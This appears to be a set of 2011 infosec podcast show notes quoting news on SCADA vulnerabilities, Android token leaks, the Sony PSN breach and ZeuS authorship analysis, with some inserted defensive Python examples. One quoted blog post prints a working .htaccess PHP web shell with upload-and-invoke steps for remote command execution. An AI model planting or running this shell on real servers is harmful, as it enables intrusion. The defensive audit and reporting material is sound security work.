Anonymous observers, who asked to remain anonymous themselves, said there's reason to believe that Brown is being cut off by core Anonymous members worried about having their identities exposed, or wary of Brown's focus on government wrongdoing. Sources say that ongoing criminal investigations of Anonymous's previous actions may soon produce indictments and that more than one longtime member has "gone dark" in recent weeks, especially after the group was mentioned as a possible source of the PlayStation Network breach.

Geordy’s comment: Wonder what his severance package is like…
Adrian’s comment: Comments here sum it up: http://anonnews.org/?p=comments&c=ext&i=1700

Source: http://www.wired.com/threatlevel/2011/05/siemens-scada-vulnerabilities/

A security researcher has discovered multiple security vulnerabilities in Siemens industrial control systems that he says would allow hackers with remote access to the systems to cause physical destruction.

Dillon Beresford canceled a planned demonstration of the vulnerabilities on Wednesday at the Takedown security conference in Texas after Siemens and the Department of Homeland Security expressed concern over the phone and at the conference about disclosing information before Siemens could patch the vulnerabilities.

Beresford, a researcher who works for NSS Labs in Austin, Texas, says he decided to cancel the talk — “Chain Reactions–Hacking SCADA” — after realizing the full ramifications of the information he planned to reveal.

“Based on my own understanding of the seriousness behind this, I decided to refrain from disclosing any information due to safety concerns for the consumers that are affected by the vulnerabilities,” Beresford told Threat Level, adding that “DHS in no way tried to censor the presentation.”

The vulnerabilities affect the programmable logic controllers in several Siemens SCADA systems. Siemens PLC products are used in companies throughout the U.S. and the world controlling everything from critical infrastructure systems such as nuclear power and enrichment plants to commercial manufacturing facilities. It was a vulnerability in a PLC belonging to Siemens’ Step7 control system that was the target of the sophisticated Stuxnet worm. Stuxnet was discovered on systems in Iran last year and is believed to have been designed by a nation state aimed at destroying uranium enrichment centrifuges at the Natanz nuclear facility in Iran.

Beresford began researching SCADA systems independently at home about two and a half months ago. He purchased SCADA products online with funding from his employer and planned to examine systems belonging to multiple vendors. Beresford began with Siemens and found multiple vulnerabilities in the products very quickly.

“They’re very easy to exploit,” Beresford said. “As long as you have access to [a PLC's] network you will be able to exploit.”

Beresford wouldn’t say how many vulnerabilities he found in the Siemens products but said he gave the company four exploit modules to test. He believes that at least one of the vulnerabilities he found affects multiple SCADA system vendors, which share “commonality” in their products. Beresford wouldn’t reveal more details but says he hopes to do so once Siemens releases a statement, which he says the company is preparing for Thursday.

Siemens did not immediately respond to a call for comment from Threat Level.

Beresford contacted ICS-CERT to disclose the vulnerabilities. ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) is a computer security group that the Department of Homeland Security operates in partnership with Idaho National Laboratory. The group researches vulnerabilities in industrial control systems and helps alert vendors and customers about security holes in products.

Beresford gave ICS-CERT exploits for the vulnerabilities, which the lab was able to confirm worked.

“They just said it was far-reaching and more serious than anything they’ve ever dealt with,” Beresford said.

A DHS official, who asked not to be identified, said only that ICS-CERT frequently engages with vendors and members of the cybersecurity community to share vulnerability information and mitigation measures and that “responsible disclosure process does not encourage the release of sensitive vulnerability information without also validating and releasing a solution.”

ICS-CERT contacted Siemens, based in Germany, and the company began to work on patches for the vulnerabilities. Both Siemens and ICS-CERT had been fine with Beresford’s initial decision to talk about the vulnerabilities at the conference but changed their mind once they saw his presentation.

Siemens was still working on patches but had found a remediation for one of the vulnerabilities. But Beresford found he was easily able to get around it.

“It’s a recommendation which is in their defense in-depth model,” Beresford says. “There’s a button in their product that says ‘protect me more.’ . . . It’s the only security feature they have in their product to protect it and it’s flawed.”

Once Siemens saw in his presentation that their mitigation didn’t work, the company realized it had to go back to the lab and reassess how to address the vulnerability, Beresford said.
The decision to pull the talk at the last minute caused rumors to fly at the conference. Another presenter at Takedown tweeted that DHS had banned Beresford’s talk.

But Beresford disputed this and said he’s been “extremely impressed” with the way ICS-CERT has handled the matter.

“This is different from simply stealing money out of someone’s bank account,” said NSS Labs CEO Rick Moy. “Things could explode. I don’t want to overplay this and sound like it’s a bunch of FUD, but physical damage can occur and people can be seriously injured or worse. So we felt … it was best to be prudent and wait a little bit longer until we get more information.”

Source:http://www.theregister.co.uk/2011/05/18/google_android_security_fix/

Google has plugged a security hole that exposed the vast majority of Android phone users' calendars and contacts when they accessed those services over unsecured networks.

"Today we're starting to roll out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts," a company spokesman wrote in an email. "This fix requires no action from users and will roll out globally over the next few days."

The server-side fix addresses an implementation error in earlier versions of Android, which are used by more than 99 percent of those using the mobile operating system, according to Google figures. Versions 2.3.3 and earlier failed to transmit authentication tokens over an encrypted channel.

Attackers monitoring Wi-Fi hotspots and other open networks could exploit the weakness by copying the so-called authTokens and using them to gain unauthorized access to users' Google Calendars and Contacts.

The vulnerability could also cause devices synchronizing with Google Picasa web albums to transmit sensitive data through unencrypted channels, academic researchers from Germany's University of Ulm said.

The Google spokesman said the company's security team is still investigating those claims.
The fix forces Google servers to use an encrypted https connection when phones sync with Calendar and Contacts.

Source: http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html

A while back I was testing a CMS that had a curious feature: all uploaded files were placed in their own directory. This was not a security enhancement, as the application allowed php files to be uploaded. However, I couldn't help asking, what if php uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self contained .htaccess web shells. I wrote both a php and a server side include shell, but other options can easily be added (jsp, mod_perl, etc).

This works by first diverting the default apache .htaccess access restriction from within the .htaccess file so we can access it as a url. Next we reconfigure the .htaccess extension to be treated as a dynamic content script, and finally we have our payload. The attack works because the .htaccess parsing and processing for apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha: the payload has to be commented out with a # at the start so it doesn't get interpreted by apache and, likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the <?php ?> tags is presented as is.

# Self contained .htaccess web shell – Part of the htshell project
# Written by Wireghoul – http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files are collectively accessible from my github htshells repository.
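As an added defensive example (not code from the htshell project or the post), the Python audit below flags the three ingredients described above in an uploaded .htaccess file: the access override for .ht* names, a handler mapping that makes .htaccess itself executable, and a script tag hidden behind a # comment. The handler names other than application/x-httpd-php and the two sample files are assumptions constructed here.

```python
"""Audit an Apache .htaccess body for the self-contained web-shell pattern:
an access override that exposes .ht* files, a handler or type mapping that
makes .htaccess itself executable, and a script payload hidden in a comment."""
import re
from typing import List, Tuple

Finding = Tuple[str, str]  # (indicator, detail)

# Directives that map a file name or extension to a content handler or type.
HANDLER_LINE = re.compile(
    r"^\s*(?P<directive>AddType|AddHandler|SetHandler|ForceType)\s+(?P<rest>.+?)\s*$",
    re.IGNORECASE | re.MULTILINE,
)
# Handler/type names that turn a file into server-side code. application/x-httpd-php
# is the one used in the post; the other entries are assumptions added for coverage.
SCRIPT_HANDLERS = ("x-httpd-php", "php-script", "cgi-script", "server-parsed", "perl-script")
# <Files ...> or <FilesMatch ...> containers and their bodies.
FILES_BLOCK = re.compile(
    r"<Files(?:Match)?\s+(?P<pat>[^>]+?)\s*>(?P<body>.*?)</Files(?:Match)?>",
    re.IGNORECASE | re.DOTALL,
)
# Apache 2.2 and 2.4 spellings of "anyone may fetch this".
GRANT_ACCESS = re.compile(r"Allow\s+from\s+all|Require\s+all\s+granted", re.IGNORECASE)
# Script open tags that have no business in a configuration file.
PAYLOAD_TAG = re.compile(r"<\?php|<\?=|<!--#(?:exec|include|echo)|<%", re.IGNORECASE)


def audit_htaccess(text: str) -> List[Finding]:
    """Return every htshell indicator present in the given .htaccess text."""
    findings: List[Finding] = []

    # 1. The stock config denies .ht* with a <Files ~ "^\.ht"> block; a user
    #    .htaccess that targets the same names and grants access undoes it.
    for m in FILES_BLOCK.finditer(text):
        pat, body = m.group("pat"), m.group("body")
        if ".ht" in pat and GRANT_ACCESS.search(body):
            findings.append(("access-override", f"<Files {pat}> grants web access to .ht* files"))

    # 2. Any handler mapping is suspicious in an upload directory; mapping the
    #    .htaccess extension itself is the signature of this shell.
    for m in HANDLER_LINE.finditer(text):
        directive, tokens = m.group("directive"), m.group("rest").split()
        if not any(h in tok.lower() for tok in tokens for h in SCRIPT_HANDLERS):
            continue
        if any(tok.lower().startswith(".ht") for tok in tokens):
            findings.append(("self-executing", f"{directive} maps .ht* to a script handler"))
        else:
            findings.append(("script-handler", f"{directive} {' '.join(tokens)}"))

    # 3. The payload rides inside a '#' comment so Apache ignores it.
    for line in text.splitlines():
        if PAYLOAD_TAG.search(line):
            findings.append(("embedded-payload", line.strip()[:60]))
            break
    return findings


def is_htshell(text: str) -> bool:
    """True when all three pieces of the pattern are present together."""
    kinds = {kind for kind, _ in audit_htaccess(text)}
    return {"access-override", "self-executing", "embedded-payload"} <= kinds


# Constructed samples (not the project's files). The shell sample follows the
# layout from the post but carries a harmless marker instead of a command runner.
SHELL_SAMPLE = r'''# constructed sample in the htshell layout
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "marker"; ?>###### LLEHS ######
'''

BENIGN_SAMPLE = '''# constructed ordinary .htaccess
DirectoryIndex index.html
RewriteEngine On
RewriteRule ^old$ /new [R=301,L]
<Files "secret.txt">
Require all denied
</Files>
'''

if __name__ == "__main__":
    for name, sample in (("shell", SHELL_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, is_htshell(sample), audit_htaccess(sample))
```

Scanning only catches what has already landed; setting AllowOverride None on upload directories removes the root cause, because Apache then never reads an uploaded .htaccess at all.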

Source:  http://www.cmio.net/index.php?option=com_articles&view=article&id=27819

The U.S. Department of Health & Human Services (HHS) Office of Inspector General (OIG) has released two reports that question HHS agencies' efforts to secure electronic protected health information.

An OIG audit cited the Office of the National Coordinator for Health IT (ONC) for its lackluster efforts in ensuring that patients' individually identifiable health information is secure and adequately protected for nationwide implementation of interoperable health IT. A second report criticized lax enforcement of the HIPAA security rule by the Centers for Medicare & Medicaid Services (CMS) prior to June 2009.

The CMS report

To determine the sufficiency of CMS’s oversight and enforcement actions pertaining to hospitals’ implementation of the HIPAA Security Rule, OIG conducted audits at seven covered hospitals around the country and found that CMS’ oversight and enforcement actions were not sufficient to ensure that covered entities, such as hospitals, effectively implemented the security rule, according to the report.

“As a result, CMS had limited assurance that controls were in place and operating as intended to protect electronic personal health information, thereby leaving electronic personal health information vulnerable to attack and compromise,” the report stated.

Source:  http://www.telegraph.co.uk/news/worldnews/middleeast/israel/8514919/Mossad-carries-out-daring-London-raid-on-Syrian-official.html

The original plan was apparently to assassinate the official, and Israel only averted what would have been a huge diplomatic rift with Britain when they decided the target was more valuable alive than dead.

The operation involved at least 10 undercover agents on the streets of Britain and led directly to a controversial bombing raid into Syrian territory that destroyed a nuclear reactor that was under construction.

It closely mirrored the assassination of Mahmoud al-Mabhouh, a senior Hamas arms trader, who was killed in his hotel room in Dubai last year using agents disguised as tennis players.

The operation began when Israeli intelligence picked up an online booking for a senior Syrian nuclear official at a hotel in Kensington, west London, in late 2006, according to the Israeli authors of the book Israel vs Iran: the Shadow War.

Mossad then dispatched three undercover teams to Britain including a team of "spotters" who were sent to Heathrow airport to identify the official as he flew in from Damascus under a false name. A second team booked into his hotel, while a third monitored his movements and any visitors.

Episode 389 – Special Guest Will Genovese, Bryon Free?, Turkey Day, WB PSN, Failstation network, Zeus forensics & NIST 800-61

InfoSec Daily Podcast Episode 389 for May 18, 2011.  Tonight's podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.


Special Guest:  Will Genovese talks to us about eXcon.

eXcon aims to be a cutting edge security conference presented by Ex-Military, Ex-Secret Service, Ex-CIA, Ex-Cons, along with some of the brightest and most recognizable pen testers, programmers, and systems experts. Tracks will include demos of social engineering, digital tracking, exploit development and implementation, and war stories. eXcon will feature a lockpicking & hackerspace village (email excon@nesit.net for more info)

More Info http://exconference.com

Stories
Source:
http://www.thestar.com/news/article/993296–g20-accused-byron-sonne-finally-released-on-bail

The last person remaining jailed on charges related to last summer’s G20 summit was released on bail Wednesday after spending 330 days in detention.

Byron Sonne, a 38-year-old Internet security expert with no criminal record, is charged with possessing explosive substances and counselling the commission of mischief not committed, for his alleged activities leading up to last summer’s G20 summit.

He was ordered released on a $250,000 bail bond and a number of stringent conditions.
After he was released from court Sonne said the first thing he was going to do is get a double-tall whole milk latte from Starbucks “and then hug my Mom and Dad a few more times.”
He at first resisted discussing his case, but later agreed with a suggestion that the Crown had made an example out of him by keeping him in custody for nearly 11 months.

“I never had any plans to hurt anybody at all – ever,” he said, adding that he is looking forward to trial. “I'm sure I'll be exonerated and everything will turn out for the best.”

Sonne refused to directly discuss his relationship with his ex-wife, who filed for separation while he was in jail and has cut off all ties with him and his family, but he said he had “suffered the loss of people very close to me, that I wish I could be with.”

Sonne also thanked his supporters “from all over the world,” but especially the Toronto-based supporters from Hacklab.TO.

Sonne’s parents, Bue and Valerie, who are both retired, posted bail for their son and will act as sureties.

He must live at their Brampton home and can only leave the residence if accompanied by either his father or mother, except to attend work, school, court or for medical emergencies.
Sonne must also have no contact with his ex-wife, Kristen Peterson, and must remain 500 metres from their matrimonial home in Forest Hill. There are no allegations of domestic disputes or violence of any kind between the couple.

He must also have no contact with anyone accused with G20 conspiracy crimes or anyone associated with a number of anarchist groups or the Toronto Community Mobilization Network. There are no allegations that Sonne has ever associated with those people or groups.
Sonne is barred from accessing the Internet, except for employment purposes, but Justice Ian MacDonnell consented to allowing Sonne to purchase a new laptop, which will be inspected by police, that he will be able to use for employment purposes only and only while in his parents’ house.

He is allowed to access email only for work, and he is not allowed to delete any emails or Internet history. Police will be allowed to inspect the computer at any time.
He is also barred from using any wireless telecommunications.

Police will also be allowed to search Sonne’s parents’ home once a week, without a search warrant.

The 361 University Ave. courthouse where he appeared was packed with media and supporters. Arguments made at the bail hearing are under a publication ban.

Sonne arrived late to the proceedings from the Maplehurst jail in Milton. Wearing a red fleece zip-up sweater and blue jeans, he smiled throughout the proceedings and acknowledged several people in the court.

He was arrested on June 22, 2010 — two days before the summit began — at the $1 million Forest Hill home he then shared with Peterson.

Peterson was arrested two days after her husband, but had all her charges dropped earlier this year. She filed for legal separation a few months after the arrest and has cut off all contact with Sonne and his family.

Police allege Sonne planned to detonate a homemade explosive in downtown Toronto to disrupt the meeting of world leaders, and had used social media to encourage people to interfere with the security apparatus.

Sonne’s supporters say their friend is non-violent but fiercely critical of state surveillance and restrictions on civil liberties. They say Sonne may have been baiting security officials to intentionally trigger an overreaction by police.

Sonne had posted photos to his Twitter feed of the security fence that surrounded the summit site and of the various surveillance cameras set up downtown. He also took photos of police, which he posted with unflattering captions such as “Bacon on wheels” and “Stationary bacon.”
Evidence heard during bail hearings and during the judicial pre-trial is under publication ban.
Sonne’s supporters — many from Toronto’s hacker community — rallied long and hard for his release. They set up a “Free Byron” website and talked about Sonne’s case at international technology conferences, garnering support from as far away as France and Germany. They accuse police of heavy-handedness and of stifling political dissent.

Upon his arrest, Sonne was also charged with possessing weapons, mischief, attempted mischief, and two counts of intimidating justice officials, but those charges were all dropped at judicial pre-trial, leaving only the explosives offence. The counselling mischief not committed charge was added at that time.

MacDonnell awarded bail earlier this week after defence lawyer Joseph Di Luca argued that the case against his client had changed substantially following judicial pre-trial. He had been denied bail twice before.

Sonne’s trial is now scheduled to begin Nov. 7.

Geordy’s comment: Canada’s penal system certainly seems uneven at best.  Seems like Byron got to take the fall for all of the Canadian government’s pent up rage.

Source: http://mashable.com/2011/05/16/turkey-protests-internet-censorship/

Disgruntled Turkish Internet users marched through the streets in more than 30 cities on Sunday to protest a new Internet filter system that they consider censorship.

The system will ask all users to choose from a selection of filters, including “family,” “children” and “domestic,” before browsing the Internet in Turkey. It is planned to take effect in August.
Earlier this month, the Information and Communication Technologies Authority (BTK) President Tayfun Acarer told reporters that the organization had introduced the filters in response to requests for better Internet safety. Currently available filters for families and children don’t work that well, he said, and the new system includes a “standard” filter option for those who don’t want their Internet browsing experience to change.

Thousands of Turkish people who used Facebook to organize and attend marches on Sunday see the measure differently.

“You’d enter a channel leading you to the server of the state, which distributes the Internet to millions of users. The system enables the control of citizens … like telephone tapping,” one of the protestors, Serkan Dogan, told The Wall Street Journal.

It’s not surprising that many Turkish people are distrustful of the BTK’s new measures. The country has a history of Internet censorship, famously blocking YouTube in 2007 due to a video that was deemed insulting to the founder of modern Turkey. That ban has been lifted, but thousands of other sites remain blocked.

Source:http://mashable.com/2011/05/17/sony-games-psn/

Twenty-eight days. That’s how long Sony’s PlayStation Network was down after hacker attacks caused a serious privacy breach and a lot of headaches for the company. Now, Sony wants to redeem itself by giving away two PS3 or two PSP games, as well as a number of other freebies, to PSN customers.

As the PlayStation Network comes back online, Sony is offering a package of free goods and services to all existing registered PlayStation Network and Qriocity users in the U.S. and Canada. This campaign to woo customers is dubbed “Welcome Back.”

The package, available for 30 days after the PlayStation Store is restored, consists of two PS3 games that can be kept forever. Customers can choose from Dead Nation, inFAMOUS, LittleBigPlanet, Super Stardust HD and Wipeout HD + Fury.

PSP owners will be able to download two of these games: LittleBigPlanet (PSP), ModNation Racers, Pursuit Force and Killzone Liberation.

Sony will also offer a selection of free movie rentals, a 30-day free PlayStation Plus membership for non-PlayStation Plus subscribers (and an additional 60 days free for existing PlayStation Plus subscribers), as well as an additional 30 days of free premium subscription for existing Music Unlimited Premium Trial subscription members (and an additional 30 days plus time lost for existing Premium/Basic members).

Finally, PlayStation Home will be offering 100 free virtual items, with additional free content to be released soon.

For customers outside the U.S. and Canada, the “Welcome Back” bag of free goodies from Sony is similar but slightly different for each country. For more info, check out the European and Latin American PlayStation Network blogs.

Geordy’s comments: Someone in the comments pointed out that Sony is also offering free identity protection for a year although I can’t find the reference anywhere.  If you take close notice, they are also playing an angle by offering 30 days of free PlayStation Plus membership to those who don’t already subscribe to PlayStation Plus.  I wonder if it will be one of those auto bill things…

Source:http://www.osnews.com/story/24757/New_Exploit_in_PSN_Sony_Takes_Change-password_Sites_Offline

Like the B-movie that keeps pumping out sequels long after running its course, Sony continually finds innovative new ways to fail at security.

Sony just restarted its Playstation Network, after the massive security fail dismissed as a 'hiccup' by Sony CEO Howard Stringer. Well, the PSN has barely been up two days, and a massive security oversight has already been discovered. Yes, Sony just got Sony'd. Again. Unbelievable.

This is just unbelievable. You may recall that as part of the PSN's relaunch, Sony released a new firmware version that forced you to change your password as an additional security measure. The problem is that before the first massive security fail, if you had honestly forgotten your password, you could create a new password by going to a Sony website and entering your email address and date of birth. Nothing special, and this site was still working just fine after PSN's relaunch to aid people in changing their passwords.

Until you realise that your email address and date of birth were among the leaked information. This means that hackers can simply go to the change-password website, enter your email address and date of birth from the stolen data, et voilà, your account has just been re-exploited. It doesn't matter if you have already changed your password following the recent firmware release.

Nyleveia discovered the exploit, and confirmed that it does, indeed, work. They contacted Sony immediately, and sure enough, the web-based change-password function was taken offline by Sony shortly after. Remember that the change-password functionality on the PS3 itself is still working just fine, since it cannot be used for the exploit.

"Unfortunately this also means that those who are still trying to change their password via Playstation.com or Qriocity.com will be unable to do so for the time being," Sony told EuroGamer, "This is due to essential maintenance and at present it is unclear how long this will take. In the meantime you will still be able to sign into PSN via your PlayStation 3 and PSP devices to connect to game services and view Trophy/Friends information."

No system is ever safe, huh, Stringer? It was just a hiccup, huh, Stringer? I'm no security expert, but I'm starting to see a structural problem here.

Update: The problem has been fixed.  http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
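The root of the PSN problem above is a reset flow whose only secret is data that sits in the same database the attackers already took. An added example, not code from Sony or from the OSNews article, showing that knowledge-based flow next to a reset that relies on a random, single-use, expiring token delivered out of band instead. The account table, token table and the fifteen-minute lifetime are assumptions made up for the example:

```python
from typing import Dict, Optional
import hashlib
import secrets
import time

# Constructed in-memory stores standing in for an account database and a
# reset-token table; a real deployment persists both (assumption).
USERS: Dict[str, dict] = {
    "alice@example.com": {"password_hash": "<old-hash>", "dob": "1980-01-01"},
}
RESET_TOKENS: Dict[str, dict] = {}  # sha256(token) -> {email, expires, used}
TOKEN_TTL_SECONDS = 15 * 60  # assumed policy: a reset link is good for 15 minutes


def _hash_password(password: str) -> str:
    # Placeholder for a real password hash (bcrypt/scrypt/argon2); sha256 is
    # used here only to keep the example dependency-free.
    return hashlib.sha256(password.encode()).hexdigest()


def reset_with_dob(email: str, dob: str, new_password: str) -> bool:
    """The knowledge-based flow the article describes: anyone holding the
    leaked e-mail address and date of birth can set a new password."""
    user = USERS.get(email)
    if user is None or user["dob"] != dob:
        return False
    user["password_hash"] = _hash_password(new_password)
    return True


def request_reset(email: str, now: Optional[float] = None) -> Optional[str]:
    """Issue a random, single-use, expiring token and return it for
    out-of-band delivery (e-mail). Returns None for unknown addresses; the
    HTTP endpoint must answer identically in both cases so it does not
    confirm which addresses exist."""
    now = time.time() if now is None else now
    if email not in USERS:
        return None
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    # Store only a hash so a leak of this table does not expose live tokens.
    RESET_TOKENS[hashlib.sha256(token.encode()).hexdigest()] = {
        "email": email, "expires": now + TOKEN_TTL_SECONDS, "used": False,
    }
    return token


def reset_password(token: str, new_password: str, now: Optional[float] = None) -> bool:
    """Consume the token: it must exist, be unused and unexpired."""
    now = time.time() if now is None else now
    rec = RESET_TOKENS.get(hashlib.sha256(token.encode()).hexdigest())
    if rec is None or rec["used"] or now > rec["expires"]:
        return False
    rec["used"] = True  # single use, even if the new password is later rejected
    USERS[rec["email"]]["password_hash"] = _hash_password(new_password)
    return True
```

The point of the contrast: `reset_with_dob` keeps working for whoever holds a copy of the customer table, whereas `reset_password` needs a value that never existed before the legitimate owner asked for it, and that dies after one use or a short wait.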

Source: http://shape-of-code.coding-guidelines.com/2011/05/11/fingerprinting-the-author-of-the-zeus-botnet/

The source code of the ZeuS Botnet is now available for download. I imagine there are a few organizations who would like to talk to the author(s) of this code.

All developers have coding habits, that is they usually have a particular way of writing each coding construct. Different developers have different sets of habits and sometimes individual developers have a way of writing some language construct that is rarely used by other developers. Are developer habits sufficiently unique that they can be used to identify individuals from their code? I don’t have enough data to answer that question. Reading through the C++ source of ZeuS I spotted a few unusual usage patterns (I don’t know enough about common usage patterns in PHP to say much about this source) which readers might like to look for in code they encounter, perhaps putting a name to the author of this code.

The source is written in C++ (32.5 KLOC of client source) and PHP (7.5 KLOC of server source) and is of high quality (the C++ code could do with more comments, say to the level given in the PHP code), many companies could increase the quality of their code by following the coding standard that this author seems to be following. The source is well laid out and there are plenty of meaningful variable names.

So what can we tell about the person(s) who wrote this code?

  • There is one author; this is based on consistent usage patterns and nothing jumping out at me as being sufficiently different that it could be written by somebody else.
  • The author is fluent in English; based on the fact that I did not spot any identifiers spelled using unusual word combinations that often occur when a developer has a poor grasp of English. Update 16-May: skier.su spotted four instances of the debug message “Request sended.” which suggests the author is not as fluent as I first thought.
  • The author is not a newbie developer, perhaps sometime in the past they were badly bitten by a Microsoft C++ compiler bug, found that this usage worked around the problem and have used it ever since.
  • (see original article for a much deeper analysis -geordy)

Could the source have been processed by a code formatter to remove fingerprint information? I think not. There are small inconsistencies in layout here and there that suggest human error, also automatic layout tends to have a ‘template’ look to it that this code does not have.

Update 16 May: One source file stands out as being the only one that does not make extensive use of camelCase and a quick search finds that it is derived from the ucl compression library.
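Two of the observations above (one file breaks the camelCase habit, and a misspelled debug string recurs) are the kind of thing a small script can surface across a whole source tree. An added example, not from the original article and not run against ZeuS: it profiles identifier style per file, flags files whose naming deviates from the corpus median, and counts a tell-tale phrase. The four source snippets are constructed for the example, with one imitating code pulled in from a third-party library:

```python
import re
import statistics
from typing import Dict, List

# Identifiers written as camelCase (at least one interior capital) versus
# snake_case (at least one interior underscore).
CAMEL_RE = re.compile(r"\b[a-z]+(?:[A-Z][a-z0-9]*)+\b")
SNAKE_RE = re.compile(r"\b[a-z]+(?:_[a-z0-9]+)+\b")

# Constructed stand-in sources; none of this is ZeuS code. Three files share
# one naming habit, the fourth imitates code taken from a third-party library.
SAMPLES: Dict[str, str] = {
    "core/socket.cpp": 'int sendRequest(Socket *sock) { int bytesSent = sock->write(buf); debugLog("Request sended."); return bytesSent; }',
    "core/config.cpp": "void parseConfig(const char *fileName) { char *configData = readFile(fileName); freeBuffer(configData); }",
    "core/priv.cpp": "bool isAdmin(DWORD processId) { HANDLE hToken = openToken(processId); return checkToken(hToken); }",
    "lib/ucl_compat.c": "int ucl_init(void) { unsigned long src_len = 0; return do_compress(src_len); }",
}


def style_profile(source: str) -> dict:
    """Count camelCase and snake_case identifiers and the camelCase share."""
    camel = len(CAMEL_RE.findall(source))
    snake = len(SNAKE_RE.findall(source))
    total = camel + snake
    return {"camel": camel, "snake": snake,
            "camel_ratio": camel / total if total else 0.0}


def outlier_files(files: Dict[str, str], max_deviation: float = 0.5) -> List[str]:
    """Files whose camelCase share differs from the corpus median by more
    than max_deviation: candidates for 'not written by the main author'."""
    profiles = {name: style_profile(src) for name, src in files.items()}
    median = statistics.median(p["camel_ratio"] for p in profiles.values())
    return sorted(name for name, p in profiles.items()
                  if abs(p["camel_ratio"] - median) > max_deviation)


def find_phrase(files: Dict[str, str], phrase: str) -> Dict[str, int]:
    """Per-file count of a tell-tale string such as a recurring misspelling."""
    return {name: src.count(phrase) for name, src in files.items() if phrase in src}
```

On real code the identifier regexes need a tokenizer that skips comments and string literals, and a single ratio is only one feature; the value of the approach is comparing many such habits file by file rather than trusting any one of them.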

Source:  http://csrc.nist.gov/publications/nistpubs/800-61-rev1/SP800-61rev1.pdf

NIST has released Special Publication 800-61 Rev 1, Computer Security Incident Handling Guide.  Here’s a short excerpt from this 147-page guide that explains fairly well what it’s about:

Computer security incident response has become an important component of IT programs. Security-related threats have become not only more numerous and diverse but also more damaging and disruptive. New types of security-related incidents emerge frequently. Preventative activities based on the results of risk assessments can lower the number of incidents, but not all incidents can be prevented. An incident response capability is therefore necessary for rapidly detecting incidents, minimizing loss and destruction, mitigating the weaknesses that were exploited, and restoring computing services. To that end, this publication provides guidelines for incident handling, particularly for analyzing incident-related data and determining the appropriate response to each incident. The guidelines can be followed independently of particular hardware platforms, operating systems, protocols, or applications.

Because performing incident response effectively is a complex undertaking, establishing a successful incident response capability requires substantial planning and resources. Continually monitoring threats through intrusion detection and prevention systems and other mechanisms is essential. Establishing clear procedures for assessing the current and potential business impact of incidents is critical, as is implementing effective methods of collecting, analyzing, and reporting data. Building relationships and establishing suitable means of communication with other internal groups (e.g., human resources, legal) and with external groups (e.g., other incident response teams, law enforcement) are also vital.

This publication seeks to help both established and newly formed incident response teams. This document assists organizations in establishing computer security incident response capabilities and handling incidents efficiently and effectively. More specifically, this document discusses the following items:

Organizing a computer security incident response capability
– Establishing incident response policies and procedures
– Structuring an incident response team, including outsourcing considerations
– Recognizing which additional personnel may be called on to participate in incident response.

Handling incidents from initial preparation through the post-incident lessons learned phase

Handling specific types of incidents
– Denial of Service (DoS)—an attack that prevents or impairs the authorized use of networks, systems, or applications by exhausting resources
– Malicious Code—a virus, worm, Trojan horse, or other code-based malicious entity that successfully infects a host
– Unauthorized Access—a person gains logical or physical access without permission to a network, system, application, data, or other IT resource
– Inappropriate Usage—a person violates acceptable use of any network or computer policies
– Multiple Component—a single incident that encompasses two or more incidents; for example, a malicious code infection leads to unauthorized access to a host, which is then used to gain unauthorized access to additional hosts.

Episode 388 – AndroidLeaks, WCE, Sqeenix, Cali laying down some LAW, Facebook, Small Businesses

InfoSec Daily Podcast Episode 388 for May 17, 2011.  Tonight's podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.


Stories

Source: http://www.theregister.co.uk/2011/05/16/android_impersonation_attacks/

The vast majority of devices running Google's Android operating system are vulnerable to attacks that allow adversaries to steal the digital credentials used to access calendars, contacts, and other sensitive data stored on the search giant's servers, university researchers have warned.

The weakness stems from the improper implementation of an authentication protocol known as ClientLogin in Android versions 2.3.3 and earlier, the researchers from Germany's University of Ulm said. After a user submits valid credentials for Google Calendar, Twitter, Facebook, or several other accounts, the programming interface retrieves an authentication token that is sent in cleartext. Because the authToken can be used for up to 14 days in any subsequent requests on the service, attackers can exploit them to gain unauthorized access to accounts.

“We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis,” the researchers in the university's Institute of Media Informatics wrote on Friday. “The short answer is: Yes, it is possible, and it is quite easy to do so.”

The findings build off previous findings of Rice University professor Dan Wallach, who in February uncovered the Android privacy shortcomings during a simple exercise for his undergraduate security class. The attacks can only be carried out when the devices are using unsecured networks, such as those offered at Wi-Fi hotspots.

Google patched the security hole earlier this month with the release of Android 2.3.4, although that version, and possibly Android 3, still cause devices synchronizing with Picasa web albums to transmit sensitive data through unencrypted channels, the researchers said. Based on Google's own statistics, this means more than 99 percent of Android-based handsets are vulnerable to the attacks, which are similar in difficulty and effect to so-called sidejacking exploits that steal authentication cookies.

A Google spokesman said the company's Android team is aware of the Picasa deficiencies and is working on a fix.

Researchers Bastian Könings, Jens Nickels, and Florian Schaub warned that the weaknesses could be used against people who use their Android devices on networks under the control of an attacker.

“To collect such authTokens on a large scale an adversary could setup a wifi access point with a common SSID (evil twin) of an unencrypted wireless network, e.g., T-Mobile, attwifi, starbucks,” they wrote. “With default settings, Android phones automatically connect to a previously known network and many apps will attempt syncing immediately. While syncing would fail (unless the adversary forwards the requests), the adversary would capture authTokens for each service that attempted syncing.”

Apps that use ClientLogin should immediately start doing so over encrypted, https channels, the researchers said. A more robust authentication protocol known as oAuth will also close the authToken capture vulnerability, although https should still be used to prevent synced data from being intercepted.

